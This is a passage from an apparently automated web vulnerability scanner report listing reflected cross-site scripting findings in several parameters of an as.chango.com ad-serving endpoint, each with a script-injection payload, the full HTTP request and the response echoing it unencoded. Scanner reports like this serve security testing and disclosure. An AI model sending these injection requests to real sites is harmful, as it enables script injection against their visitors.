d=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&kf=452172&atype=HISTORIC&test=0&adpos=0&bidder=bidder02-sj-west2fefb"><script>alert(1)</script>5a00be50b31&ioi=13672&ts=1317849596069&sig=c485c0cefccda7a06afc37dd5dfc0442&cu=&dsi=None&clickURL=">
...[SNIP]...

3.36. http://as.chango.com/links/adunit/1.31784959608e+12 [datc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the datc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab278"><script>alert(1)</script>8004c2bdc0b was submitted in the datc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+joseab278"><script>alert(1)</script>8004c2bdc0b&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "b2787e6a7b896013f2037b812760678dc94aa198"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:35:17 GMT
Content-Length: 2280
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:17 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:17 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
ttp://www.wattpad.com/stories/search/xss%20carbon&dom=wattpad.com&ibs=None&mw=1.0&poo=o&kwid=5827781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san joseab278"><script>alert(1)</script>8004c2bdc0b&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&kf=452172&atype=HISTORIC&test=0&adpos=0&bidder=bidder02-sj-west&ioi=13672&ts=1317849596069&sig=c485c0cefccda7a06afc37dd5dfc0442&
...[SNIP]...

3.37. http://as.chango.com/links/adunit/1.31784959608e+12 [dc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the dc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbf0c"><script>alert(1)</script>f98a024da8a was submitted in the dc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemediacbf0c"><script>alert(1)</script>f98a024da8a&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "9e7a10ab1d1f5d0420a511a5a7f755fc2fa70fdb"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2283
Date: Wed, 05 Oct 2011 21:35:17 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:17 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemediacbf0c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ef98a024da8a%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:17 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
tpad.com&url=http://www.wattpad.com/stories/search/xss%20carbon&dom=wattpad.com&ibs=None&mw=1.0&poo=o&kwid=5827781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemediacbf0c"><script>alert(1)</script>f98a024da8a&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&kf=452172&atype=HISTORIC&test=0&adpos=0&bidder=bidder02-sj-west&ioi=13672&ts=1317849596069&sig=c485c0cefccda7a06af
...[SNIP]...

3.38. http://as.chango.com/links/adunit/1.31784959608e+12 [dom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the dom request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8499"><script>alert(1)</script>a3ca4e080d0 was submitted in the dom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.comb8499"><script>alert(1)</script>a3ca4e080d0&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "707be14b16e07f517a7e0c5d21e584387c5d18ff"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2283
Date: Wed, 05 Oct 2011 21:35:17 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:17 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:17 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
sz=728x90;ord=1317850517935;click1=http://as.chango.com/links/click1317850517.94?acid=10699&adid=13711&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories/search/xss%20carbon&dom=wattpad.comb8499"><script>alert(1)</script>a3ca4e080d0&ibs=None&mw=1.0&poo=o&kwid=5827781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freewa
...[SNIP]...

3.39. http://as.chango.com/links/adunit/1.31784959608e+12 [eid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the eid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6dfa"><script>alert(1)</script>ba971af3b5 was submitted in the eid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicona6dfa"><script>alert(1)</script>ba971af3b5&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "4be98212c7bfecb897ccbebbe7fd8fba46dccd1d"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2259
Date: Wed, 05 Oct 2011 21:35:20 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:20 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicona6dfa%22%3E%3Cscript%3Ealert%281%29%3C/script%3Eba971af3b5%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:20 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
ango.com/links/click1317850520.11?acid=10699&adid=13711&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories/search/xss%20carbon&dom=wattpad.com&ibs=None&mw=1.0&poo=o&kwid=5827781&eid=Rubicona6dfa"><script>alert(1)</script>ba971af3b5&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=0&kw=Malware+freeware&uf=4&kf=452172&atype=HISTORIC&test=0&adpos=0&bidder
...[SNIP]...

3.40. http://as.chango.com/links/adunit/1.31784959608e+12 [ht parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the ht request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c02f"><script>alert(1)</script>e7d61d5c8f5 was submitted in the ht parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=909c02f"><script>alert(1)</script>e7d61d5c8f5&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Content-Length: 464
Server: Chango RTB Server
ETag: "3efa5a2bfbe2bcc7441a5ad1686bb72f6a1daa4c"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:35:20 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:20 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:20 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body style="width: 728px; height: 909c02f"><script>alert(1)</script>e7d61d5c8f5px; margin: 0; padding: 0;">
...[SNIP]...

3.41. http://as.chango.com/links/adunit/1.31784959608e+12 [ibs parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the ibs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcdd5"><script>alert(1)</script>30efd1cf622 was submitted in the ibs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=Nonefcdd5"><script>alert(1)</script>30efd1cf622&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "873cd6beed65147d925116060c8116f021355ef5"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:35:21 GMT
Content-Length: 2283
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:20 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:20 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
;ord=1317850520935;click1=http://as.chango.com/links/click1317850520.94?acid=10699&adid=13711&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories/search/xss%20carbon&dom=wattpad.com&ibs=Nonefcdd5"><script>alert(1)</script>30efd1cf622&mw=1.0&poo=o&kwid=5827781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&k
...[SNIP]...

3.42. http://as.chango.com/links/adunit/1.31784959608e+12 [poo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the poo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39283"><script>alert(1)</script>c1c0b3a1f05 was submitted in the poo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o39283"><script>alert(1)</script>c1c0b3a1f05&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "34b10f589afe874e2a80f449ea918c29527a3d0f"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2283
Date: Wed, 05 Oct 2011 21:35:23 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:23 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:23 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
23127;click1=http://as.chango.com/links/click1317850523.13?acid=10699&adid=13711&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories/search/xss%20carbon&dom=wattpad.com&ibs=None&mw=1.0&poo=o39283"><script>alert(1)</script>c1c0b3a1f05&kwid=5827781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&kf=452172&atyp
...[SNIP]...

3.43. http://as.chango.com/links/adunit/1.31784959608e+12 [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the sid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98b84"><script>alert(1)</script>1a58b06938f was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c98b84"><script>alert(1)</script>1a58b06938f&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "3ccbb74628e5162de88167a551c5399c17643cb5"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:35:23 GMT
Content-Length: 2283
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:23 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:23 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
